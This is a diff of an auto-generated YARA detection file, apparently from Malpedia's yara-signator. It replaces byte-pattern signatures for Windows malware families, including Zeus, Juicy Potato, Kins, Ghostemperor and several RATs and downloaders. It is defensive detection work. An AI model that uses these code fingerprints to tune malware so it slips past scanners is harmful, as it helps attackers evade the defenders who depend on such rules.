+		logic_hash = "1c95a0f1a2e7fb0ee9c8ab7674fdf844ade84df8607e565506c61944d3da6b96"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84857,32 +84855,32 @@ rule MALPEDIA_Win_Blind_Edr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bcf e8???????? 488bc5 e9???????? 498b6e18 488bcf e8???????? }
-		$sequence_1 = { 483b442468 75d7 85db 7e58 }
-		$sequence_2 = { 498b84ffe0fc0100 90 493bc6 0f84ae000000 4885c0 0f85a7000000 4d3bc1 }
-		$sequence_3 = { 488d8c24b0000000 41b808000000 488bd3 e8???????? 4883c308 4883ef01 0f8560ffffff }
-		$sequence_4 = { 488d542450 4533c9 41b802000000 488d4b02 e8???????? 6639742450 747a }
-		$sequence_5 = { 488d4b10 4533c9 41b808000000 488d542448 }
-		$sequence_6 = { 745e 4883c108 4c89b424a8000000 4533c9 488d9424a8000000 }
-		$sequence_7 = { 4883ec20 488bda 4c8d0d20fd0000 8bf9 488d1517fd0000 }
-		$sequence_8 = { e8???????? 4533c9 4c89742460 41b808000000 }
-		$sequence_9 = { 4c8d0503fd0000 e8???????? 488bd3 8bcf 4885c0 7408 ff15???????? }
+		$sequence_0 = { 83c40c 8d45e0 50 ff15???????? 0fb745ee }
+		$sequence_1 = { c705????????69e053a4 c705????????120d934e c705????????b0b65443 c705????????4df9e511 c705????????0e9a3f4b }
+		$sequence_2 = { 83e103 f3a4 8dbd98faffff 4f }
+		$sequence_3 = { c705????????9cb95b4c c705????????2d494a94 c705????????8db133d4 c705????????8e220b1d c705????????6825794d c705????????4506ce62 }
+		$sequence_4 = { 8d85bcf3ffff 50 ff15???????? 8bf0 }
+		$sequence_5 = { c705????????f0e91f15 c705????????9cb95b4c c705????????2d494a94 c705????????8db133d4 c705????????8e220b1d }
+		$sequence_6 = { 68???????? 56 e8???????? 6800f00000 81c690ef0000 68???????? }
+		$sequence_7 = { c785b8faffff39313044 c1e902 f3a5 8bca }
+		$sequence_8 = { 6800040000 8d8598f6ffff 6a00 50 e8???????? 83c40c 8d8598feffff }
+		$sequence_9 = { e8???????? 6890ef0000 8d7760 68???????? }
 
 	condition:
-		7 of them and filesize < 299008
+		7 of them and filesize < 1171456
 }
-rule MALPEDIA_Win_Pipemon_Auto : FILE
+rule MALPEDIA_Win_Devopt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "641a9fef-3a8d-534e-bfa2-dfb8a6acf672"
+		id = "c196c87a-940f-5170-bdeb-5480f0772987"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pipemon_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.devopt_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e491e9d37fd535256d0dbfcb98468cb6b5a0e8d2ca1e4782bf7c27cb6ebbc39b"
+		logic_hash = "d44283c361e67f2f245bfc24e6c20517af3480cb8098b2e4e26bd4743afb76d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84896,32 +84894,32 @@ rule MALPEDIA_Win_Pipemon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 4883ec20 488bf9 4c8d0df8c50000 b903000000 4c8d05e4c50000 }
-		$sequence_1 = { 488bec 4883ec40 488d45e8 48894de8 488945f0 488d15c0a80000 b805000000 }
-		$sequence_2 = { 488d0d620b0000 e8???????? e8???????? 488d15794a0100 488d0d524a0100 }
-		$sequence_3 = { 81f95d68fa3c 0f85a3000000 4d8b5620 41bfffff0000 }
-		$sequence_4 = { 895128 488d0d6fa90000 488b45d8 488908 }
-		$sequence_5 = { 4533ff 443b432c 723d 450fb75a06 410fb7d7 66453bfb 732b }
-		$sequence_6 = { 4c8d442458 488d4c2438 e8???????? 4c8d4820 4889442420 4c8bc3 488d5588 }
-		$sequence_7 = { 488bd8 483b5c2440 e9???????? c644243000 488d8570060000 4889442428 4c8d4c2450 }
-		$sequence_8 = { 48894a08 488d4c2420 e8???????? 488d05ce3a0100 488903 488bc3 }
-		$sequence_9 = { cc 4883ec48 488bd1 488d4c2420 e8???????? 488d15dcdc0100 }
+		$sequence_0 = { eb47 8b45fc 0fb6809e030000 50 8b45fc 8a889d030000 8b45fc }
+		$sequence_1 = { ff15???????? 8b45f4 8d4060 50 6863090000 6a00 6a09 }
+		$sequence_2 = { eb0f 8b45fc 8b4050 8b55fc 8b4dfc ff514c 89ec }
+		$sequence_3 = { f77dac 0fb755cc 8d0410 66894588 0fb745c6 0fb755ce 29d0 }
+		$sequence_4 = { eb36 807dd8b3 7530 0fb645d4 2d80000000 83f824 7322 }
+		$sequence_5 = { ff526c 8845f0 660fb645f0 66250100 66a9ffff 7502 eb09 }
+		$sequence_6 = { eb2a 6a00 8d45e8 50 66b90000 66ba0000 66b80000 }
+		$sequence_7 = { eb46 8b45fc 8b4034 8b55fc 8b4dfc 8b4934 ff91fc000000 }
+		$sequence_8 = { e8???????? 8d7600 b801000000 89f1 d3e0 8d50ff 21da }
+		$sequence_9 = { ff75c0 8b4dbc 8b55c4 8d45ec e8???????? 84c0 7509 }
 
 	condition:
-		7 of them and filesize < 389120
+		7 of them and filesize < 4645888
 }
-rule MALPEDIA_Win_Breach_Rat_Auto : FILE
+rule MALPEDIA_Win_Kins_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c23c3fa3-17cd-5c37-b04d-874bf808dbb3"
+		id = "743f9274-41e4-5665-bc30-911487d51855"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.breach_rat_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kins_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "f6957c0f2edc673a234b7e2f6939826a76594123ef28991fd2cfa30c71d906d4"
+		logic_hash = "26d261757c4f136c791aeb2f4de3cf368918a3d762b525e91ab2a0dc9fc542ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84935,34 +84933,34 @@ rule MALPEDIA_Win_Breach_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2b4da4 f7e9 c1fa02 8bc2 c1e81f 03c2 744a }
-		$sequence_1 = { 8b450c 2bf0 83c002 0345f0 56 50 eb08 }
-		$sequence_2 = { 8d4db8 e8???????? 83c410 84c0 742c 8b4dd4 }
-		$sequence_3 = { ff4dc4 895d08 0f8548fdffff 8b5d98 8b7d9c 85db }
-		$sequence_4 = { c745bc00000000 c645ac00 56 8bd7 c645fc0b 8d8d6cffffff e8???????? }
-		$sequence_5 = { 8bc2 c1e81f 03c2 83f807 7616 8d87a8000000 3bf0 }
-		$sequence_6 = { 53 57 8b7d08 33db 895df0 85ff 7464 }
-		$sequence_7 = { e8???????? 8bc8 e8???????? 8d8d24f1ffff c745fcffffffff e8???????? 68???????? }
-		$sequence_8 = { e8???????? 50 8d8c2480000000 e8???????? 8b442428 85c0 7416 }
-		$sequence_9 = { 68???????? 8d8d54f7ffff e8???????? 68???????? 8d8554f7ffff c745fcc8000000 50 }
+		$sequence_0 = { 5f 5e 5b c9 c3 ff0d???????? 7518 }
+		$sequence_1 = { e8???????? 6a2e 8d7b18 57 e8???????? 84c0 743e }
+		$sequence_2 = { 8b4d0c 890491 42 33c0 85f6 75c2 8b4510 }
+		$sequence_3 = { 33da 035dec 897dfc 8d84032211906b c1c007 03c7 8bfe }
+		$sequence_4 = { 89441904 33c0 eb03 33c0 40 5f }
+		$sequence_5 = { e8???????? 8bf0 85f6 0f8512010000 8d45dc 8bd8 e8???????? }
+		$sequence_6 = { e8???????? 33ff 85ff 7526 837c242800 0f85cefeffff 8b7508 }
+		$sequence_7 = { 56 ffd7 833d????????04 720a 56 }
+		$sequence_8 = { 7510 837de801 750a 8b4720 894714 c645ff01 8a45ff }
+		$sequence_9 = { 72f0 8d411c e8???????? 83611800 }
 
 	condition:
-		7 of them and filesize < 645120
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Zeus_Auto : FILE
+rule MALPEDIA_Win_Sienna_Purple_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a7137ca7-f65f-570e-b179-06b94ad7a971"
+		id = "5c3c6fac-b35f-5f08-8ac2-d022904e5031"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_auto.yar#L1-L225"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sienna_purple_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3d703221ad7e27ff4fc081759a0590d4715ffa458d7987388aee7eef0fc141ff"
+		logic_hash = "8adbc4e03be709562af32b6e6ccf0666aff8c85f72382f2d72c386abf2d917ba"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84974,45 +84972,32 @@ rule MALPEDIA_Win_Zeus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb58 833f00 7651 8b5f08 }
-		$sequence_1 = { 8d461c 50 8d45f0 50 e8???????? 6a10 8d460c }
-		$sequence_2 = { 8d461c 50 8d460c 50 e8???????? }
-		$sequence_3 = { 8d440810 8bc8 2bca 8b12 }
-		$sequence_4 = { 8d460c 8d4df0 e8???????? f7d8 1ac0 fec0 c9 }
-		$sequence_5 = { 85c0 7438 83600400 8918 8b4e08 }
-		$sequence_6 = { 8906 85ff 760c 8b550c }
-		$sequence_7 = { 83f801 7516 51 e8???????? }
-		$sequence_8 = { 8bf3 6810270000 ff35???????? ff15???????? }
-		$sequence_9 = { 891d???????? 891d???????? ffd6 68???????? }
-		$sequence_10 = { e8???????? 84c0 7442 6a10 }
-		$sequence_11 = { 8d8db0fdffff e8???????? 8ad8 84db }
-		$sequence_12 = { c20400 55 8bec f6451802 }
-		$sequence_13 = { ff15???????? 5e 8ac3 5b c20800 55 }
-		$sequence_14 = { b364 6a14 eb18 81fb5a5c4156 }
-		$sequence_15 = { 8d470c 50 c707000e0000 c7470809080002 e8???????? 83674200 6a78 }
-		$sequence_16 = { 3509080002 3d5c5b4550 740b 3d59495351 0f85ca000000 807b0420 0f85c0000000 }
-		$sequence_17 = { 0f873d020000 83fe06 0f86e3000000 8b03 3509080002 3d5c5b4550 740b }
-		$sequence_18 = { 68???????? 6809080002 8bc6 50 8d45fc }
-		$sequence_19 = { 56 68???????? ff750c 51 ff7508 ff15???????? 8bf8 }
-		$sequence_20 = { 8d75a8 b8d5000000 e8???????? 68e6010000 68???????? 6809080002 }
-		$sequence_21 = { 6813270000 6a04 5b 8bc6 c745f809080002 e8???????? 8ad8 }
-		$sequence_22 = { 807b0244 7429 83fe04 0f82ec000000 8b1b 81f309080002 }
+		$sequence_0 = { e8???????? c645fc05 e9???????? 83ff11 0f85b6000000 6a74 8d8560ffffff }
+		$sequence_1 = { 8955f8 894514 3b45dc 0f8c41ffffff 5f 5e 5b }
+		$sequence_2 = { 8d86d4000000 50 8d86fc000000 50 8d45dc 50 e8???????? }
+		$sequence_3 = { 8d4ddc e9???????? 8d4dc8 e9???????? 8d8d28ffffff e9???????? 8d8d14ffffff }
+		$sequence_4 = { 99 0bfe f7fb c1e708 0fb60c0a 8d4201 99 }
+		$sequence_5 = { e8???????? 8bf0 83c410 85f6 0f858b050000 c785b8ebffffe05e4300 eb24 }
+		$sequence_6 = { 8d8d98fdffff f7d8 1bc0 05b1040000 50 e8???????? 8d45d4 }
+		$sequence_7 = { e8???????? 83c40c 85c0 0f85fa000000 50 8d45c8 50 }
+		$sequence_8 = { e8???????? e9???????? 0f57c0 c745e800000000 8d4dd0 660fd645e0 f30f7f45d0 }
+		$sequence_9 = { e8???????? 8b8d74feffff 8d855cffffff 53 50 e8???????? 8d85dcfeffff }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 2930688
 }
-rule MALPEDIA_Win_Juicy_Potato_Auto : FILE
+rule MALPEDIA_Win_5T_Downloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "874d6ec6-fd0c-5bd7-9c40-0556815f8763"
+		id = "c4a370ca-6c61-5c78-8868-cd8df81cd00c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.juicy_potato_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.5t_downloader_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "1027b6a0329ebee66fff8afc52e7ac6bf20b1db9537e47f298642e3fe872d860"
+		logic_hash = "584a19ffb7b53f3b149aeb982ecf23155ae77e2c2b57bc23c34103eb885f8cf5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85026,32 +85011,32 @@ rule MALPEDIA_Win_Juicy_Potato_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8521ffffff 44882b eb7b 488b9540070000 4c8d05d7b20200 }
-		$sequence_1 = { e8???????? 488d1548380300 488d4c2420 e8???????? cc 488d4c2420 e8???????? }
-		$sequence_2 = { 0fb7d0 488d8de0000000 81ca00000780 85c0 0f4ed0 e8???????? 488d15a8350200 }
-		$sequence_3 = { 488d054ab1ffff 4889442438 488d4c2428 e8???????? }
-		$sequence_4 = { e8???????? eb98 488d4c2420 e8???????? 488d15fee90200 488d4c2420 }
-		$sequence_5 = { 4889442430 8b442478 89442428 488b442470 4c8b11 4889442420 }
-		$sequence_6 = { 488901 488d05660b0100 48894110 f6c201 740a ba90000000 e8???????? }
-		$sequence_7 = { 4885c0 7509 488d056f200400 eb04 4883c024 8938 e8???????? }
-		$sequence_8 = { 4883ec20 488bd9 488bc2 488d0d9dc10000 48890b }
-		$sequence_9 = { 44016f6c 48875308 4c396b08 7521 8364242800 488d0560acfeff 4889442430 }
+		$sequence_0 = { 7403 5d ffe1 83c8ff }
+		$sequence_1 = { 55 8bec 8b4508 85c0 7416 83781400 7510 }
+		$sequence_2 = { 8b4508 85c0 7416 83781400 7510 }
+		$sequence_3 = { 83781800 7403 5d ffe1 }
+		$sequence_4 = { 85c9 7409 83781800 7403 5d ffe1 83c8ff }
+		$sequence_5 = { 85c9 7409 83781800 7403 5d ffe1 }
+		$sequence_6 = { 83781800 7403 5d ffe1 83c8ff }
+		$sequence_7 = { 85c9 7409 83781800 7403 }
+		$sequence_8 = { 85c0 7416 83781400 7510 }
+		$sequence_9 = { 7409 83781800 7403 5d }
 
 	condition:
-		7 of them and filesize < 736256
+		7 of them and filesize < 539648
 }
-rule MALPEDIA_Win_Pebbledash_Auto : FILE
+rule MALPEDIA_Win_Cohhoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5b2e91f-ba86-5aee-a150-1a0e9285e25b"
+		id = "eea8dd21-8908-5be8-a2a6-255fd0ffd6ca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pebbledash_auto.yar#L1-L181"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cohhoc_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "e36d4a9a300e40c4a3570c6f2230ff5d0e8e8c772444b2ae33bda786b301ae99"
+		logic_hash = "722fe87316c37305b3652db78bba219c2fd88a714a6565f0318a82058c8a1b30"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85065,38 +85050,32 @@ rule MALPEDIA_Win_Pebbledash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 b9???????? e8???????? 85c0 7514 }
-		$sequence_1 = { 5e c3 55 8b6c2408 56 33f6 8b4d00 }
-		$sequence_2 = { e8???????? 6888130000 ff15???????? b9???????? e8???????? 68???????? e8???????? }
-		$sequence_3 = { 832000 a1???????? a3???????? c3 8b442404 a3???????? }
-		$sequence_4 = { 5b 5e 5f c9 c3 6a01 ff742408 }
-		$sequence_5 = { e8???????? 33d2 b90e000000 f7f1 }
-		$sequence_6 = { 6829080000 68???????? 68???????? e8???????? }
-		$sequence_7 = { 5e c3 55 8bec 833d????????00 750f }
-		$sequence_8 = { 41894e04 0fb64209 0fb64a08 c1e108 0bc8 0fb6420a c1e108 }
-		$sequence_9 = { 4c8bf1 488bf1 85c0 bd01000000 0f44c5 41c1e008 8905???????? }
-		$sequence_10 = { c1e108 0bc8 0fb6420b c1e108 0bc8 41894e08 0fb6420d }
-		$sequence_11 = { 0fb64201 4c8db100010000 0fb63a 4c8d258fdaffff 440fb65a04 4d8be8 440fb64a08 }
-		$sequence_12 = { 66420f6e4ccb10 4b8d0c5b 660f6e5ccb10 4183c308 4c8d0440 66420f6e54c310 8d47ff }
-		$sequence_13 = { 41c1e008 8905???????? 0fb64201 440bc0 0fb64202 41c1e008 }
-		$sequence_14 = { 415e 415d 415c 5d c3 498bcc e8???????? }
-		$sequence_15 = { e8???????? 488b0d???????? 33d2 ffd0 85c0 }
+		$sequence_0 = { 8b9c242c3c0000 66ab aa b9000f0000 33c0 8d7c2420 c745008d000000 }
+		$sequence_1 = { 57 33c0 bf???????? 83c9ff f2ae }
+		$sequence_2 = { 50 68???????? 68???????? c74424200c000000 895c2424 c744242801000000 ffd6 }
+		$sequence_3 = { 8d7c244c 83c9ff 33c0 83c420 f2ae }
+		$sequence_4 = { 8b4c2420 8b542424 8b6c2428 8b5c242c 6a08 }
+		$sequence_5 = { be???????? 8d7c2410 33ed f3a5 8b4c245c }
+		$sequence_6 = { 8d442410 53 50 68???????? 68???????? c74424200c000000 }
+		$sequence_7 = { 894c2410 89442414 0f85f5feffff b801000000 5f 895d08 }
+		$sequence_8 = { 8944242c 0f85b5feffff 8bce e8???????? 668b5702 50 }
+		$sequence_9 = { 8b0d???????? 891d???????? 51 c705????????02000000 e8???????? 83c420 }
 
 	condition:
-		7 of them and filesize < 677888
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Banpolmex_Auto : FILE
+rule MALPEDIA_Win_Alreay_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "09c8ccaf-8f5a-5f11-8d59-2eeae879be55"
+		id = "e56c2c54-ad52-5b52-a7dc-5167ef6188a3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.banpolmex_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alreay_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ca7f23e428ff171c615716f21966c01f85ab62bd4b01db41e41afe5b6847958b"
+		logic_hash = "691ad5e65c868108d2cf9f6c8d61af6c7a9420c74e344971bfa56b9838124959"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85110,73 +85089,34 @@ rule MALPEDIA_Win_Banpolmex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bcf e8???????? e9???????? 3d4c494b50 7515 488d4c2430 4c8bc7 }
-		$sequence_1 = { 488b4d07 4885c9 7406 ff15???????? 4183fd04 7512 488d1560960200 }
-		$sequence_2 = { 418bc0 c1e808 0fb6c8 418b848a20de0800 250000ff00 33d0 }
-		$sequence_3 = { 8944246c 8bf8 ff15???????? 488bd8 4885c0 0f847e010000 8d4e40 }
-		$sequence_4 = { 410fb6c5 45338487000c0000 4433460c 418bc0 c1e810 0fb6d0 418bc1 }
-		$sequence_5 = { 0f47d0 8915???????? 488d0d42130900 e8???????? 4c8b6c2468 4c8b642470 488bac24a0000000 }
-		$sequence_6 = { 7439 4883c420 5b c3 488d91d0000000 41b840000000 e8???????? }
-		$sequence_7 = { 4885ff 7406 89aee4000000 4885db 7406 89aee0000000 33c0 }
-		$sequence_8 = { 488d542440 4c8bc3 488bc8 488bf8 c744244000000400 e8???????? 33ed }
-		$sequence_9 = { 488bd3 488bcf e8???????? 85c0 78ba 8b03 803c3805 }
-
-	condition:
-		7 of them and filesize < 1555456
-}
-rule MALPEDIA_Win_Unidentified_073_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ba61f73-e46a-5f54-853f-f1f3b502ee26"
-		date = "2022-08-05"
-		modified = "2022-08-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_073_auto.yar#L1-L125"
-		license_url = "N/A"
-		logic_hash = "8100472ca712d569bbcdb570af72e3f13986092b4d8ee8e3873da55bef76232d"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20220805"
-		malpedia_hash = "6ec06c64bcfdbeda64eff021c766b4ce34542b71"
-		malpedia_version = "20220808"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 8d8538ffffff 6a00 c746180f000000 8bce }
-		$sequence_1 = { c684242801000019 e8???????? 68???????? 8d8c24c0000000 e8???????? 6aff }
-		$sequence_2 = { 8bce c7461400000000 50 c6460400 e8???????? 83ec1c 8bf4 }
-		$sequence_3 = { 7846 8b451c 8b0e 2bc1 3bc3 7c53 }
-		$sequence_4 = { 8b0d???????? 894df8 eb09 8b55f8 83ea01 8955f8 837df800 }
-		$sequence_5 = { 6a00 8d8424dc000000 50 8d4c2454 e8???????? 83ec1c 8d84240c010000 }
-		$sequence_6 = { 8bec 51 894dfc c705????????90664a00 833d????????00 741c }
-		$sequence_7 = { 6bd103 8982a0784a00 68???????? 8b45fc 50 ff15???????? }
-		$sequence_8 = { 0fb74df8 894de0 668b55e0 668955f8 0fb745fc 0fb74df8 3bc1 }
-		$sequence_9 = { 57 6aff 68???????? 50 ff15???????? }
+		$sequence_0 = { 8a4f06 0bc2 33d2 8b742414 8a7704 8a5705 c1e208 }
+		$sequence_1 = { 0f859ffdffff 8b8538010000 3bc3 741d 83f801 7418 899de8010000 }
+		$sequence_2 = { 8b6c2424 898760020000 8b442420 896e58 8b6c242c 896e68 89861c010000 }
+		$sequence_3 = { 8bd0 0bd3 0f8419010000 33c9 8bd3 894c2420 894c2424 }
+		$sequence_4 = { b926020000 33c0 8bfe f3ab 8dbe10020000 57 e8???????? }
+		$sequence_5 = { 8b542418 51 57 52 ff15???????? 85c0 7508 }
+		$sequence_6 = { 8d4c2414 56 33ed 8b38 895c244c 894c2414 e8???????? }
+		$sequence_7 = { 897c2418 89bc3490000000 8b7c241c 8bf7 8bdf c1e615 c1eb0b }
+		$sequence_8 = { 8b7e34 3bfb 7436 8b4760 3bc3 740f 50 }
+		$sequence_9 = { 8beb 8aa760954700 33e8 c1e508 33c0 33db 8a442411 }
 
 	condition:
-		7 of them and filesize < 1974272
+		7 of them and filesize < 1867776
 }
-rule MALPEDIA_Win_Unidentified_077_Auto : FILE
+rule MALPEDIA_Win_Ghostemperor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6846d21-78e4-583b-8f44-246681283285"
+		id = "eb9bf224-db51-5bdd-bed6-58106efc8832"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_077_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghostemperor_auto.yar#L1-L226"
 		license_url = "N/A"
-		logic_hash = "ae8dcec1ad8cfc6899d8fdf0b1cf7ff7e070518ed02c06d0a8c7c2869d228f4f"
+		logic_hash = "7df60cceb98a60fe2e2f53ccef69a2b508e5a3019ab430e008473c427496d31f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85188,32 +85128,46 @@ rule MALPEDIA_Win_Unidentified_077_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4210 83c220 f30f6f0418 660fefc1 f30f7f0418 413bd1 }
-		$sequence_1 = { 48894640 488d05a1fcffff 48894648 8b442424 }
-		$sequence_2 = { 4933f8 4a87bcf1a0bf0100 33c0 488b5c2450 488b6c2458 488b742460 }
-		$sequence_3 = { 4c8d442470 897c2470 488d542468 897c2468 488bcb e8???????? 85c0 }
-		$sequence_4 = { 498bc6 4823cb 4823c3 483bc1 7354 6690 b910000000 }
-		$sequence_5 = { e8???????? 85c0 0f85c6000000 448b442468 }
-		$sequence_6 = { 488b8dd00c0000 4833cc e8???????? 4881c4f80d0000 415f 415d 415c }
-		$sequence_7 = { 33c0 488bb424a0000000 4c8bb424a8000000 488bac2498000000 4c8b7c2460 488b4c2450 }
-		$sequence_8 = { 751b ff15???????? 488bce 418907 }
-		$sequence_9 = { 488d0592fcffff 48894630 488d0597fcffff 48894638 488d059cfcffff 48894640 }
+		$sequence_0 = { c7464800000000 488d4e18 ff15???????? 488b4e40 }
+		$sequence_1 = { 89d5 4889ce b920000000 e8???????? 4889c7 0f57c0 0f2900 }
+		$sequence_2 = { 4885c9 7443 4889ce ff15???????? }
+		$sequence_3 = { 4883c601 4883c2f8 39f1 75ec 4929d1 }
+		$sequence_4 = { 4883ec28 ff15???????? 488d542424 89c1 ff15???????? 85c0 7406 }
+		$sequence_5 = { 418d42ff 4c8d5801 4983fb04 7222 488d3cc2 4883c708 }
+		$sequence_6 = { 4839cf 0f86fb000000 488d04c1 4883c008 }
+		$sequence_7 = { 488d5108 e8???????? 8b4648 85c0 746e }
+		$sequence_8 = { 49895d38 41897530 eb18 418b07 85c0 7411 4c03f8 }
+		$sequence_9 = { 01c3 69cbe8030000 81c130750000 4883ec20 }
+		$sequence_10 = { 01c1 89ca c1ea1f c1f904 }
+		$sequence_11 = { 488364c60800 488b05???????? 8a5008 488d4810 ff15???????? }
+		$sequence_12 = { 41391e 0f84fc010000 418b06 85c0 745d 448b4540 }
+		$sequence_13 = { 052797fa04 351337a665 8945f4 488b4510 }
+		$sequence_14 = { 4154 4156 488d6898 4881ec50010000 4533f6 4c8d257b390000 488bd9 }
+		$sequence_15 = { 05f226dac9 35bcfe1eea 894534 488b4550 }
+		$sequence_16 = { c745505f007300 c74554ee005200 0f1185c8030000 c74558ec005600 c7455c05008500 0f104d50 }
+		$sequence_17 = { 00c2 488b8568020000 8854080c 488b85b0020000 }
+		$sequence_18 = { 488bcf 2b542428 83c207 e8???????? 85c0 }
+		$sequence_19 = { 0552f0384d 358e257f87 894530 488b4570 }
+		$sequence_20 = { 01d1 89ca c1e205 89cb }
+		$sequence_21 = { 3d040000c0 7567 8b542450 33c9 ff15???????? 488bf8 }
+		$sequence_22 = { 00c1 488b8568020000 488b95b0020000 884c100c }
+		$sequence_23 = { 33c0 488b6c2438 488b742440 48894f38 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 1115136
 }
-rule MALPEDIA_Win_Ntospy_Auto : FILE
